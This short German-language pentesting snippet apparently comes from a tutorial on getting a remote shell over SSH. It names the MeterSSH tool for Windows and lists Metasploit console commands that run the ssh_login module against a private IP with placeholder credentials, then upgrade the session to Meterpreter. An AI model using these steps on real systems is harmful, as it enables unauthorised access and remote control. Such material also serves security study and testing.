Windows:
Sie können versuchen, MeterSSH zu verwenden .
MeterSSH ist eine einfache Methode, um nativen Shellcode in den Speicher zu injizieren und alles über SSH an den Angreifer durch einen SSH-Tunnel zu leiten, der sich in einer einzigen Python-Datei befindet.
Linux:
Sie können das Zusatzmodul von metasploit mit dem Namen ssh_login verwenden:
msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > set rhosts 192.168.0.109 msf auxiliary(ssh_login) > set username foo msf auxiliary(ssh_login) > set password bar msf auxiliary(ssh_login) > exploit
Konvertieren Sie nun die Befehlsshell durch folgenden Befehl in die Meterpreter-Shell
session –u 1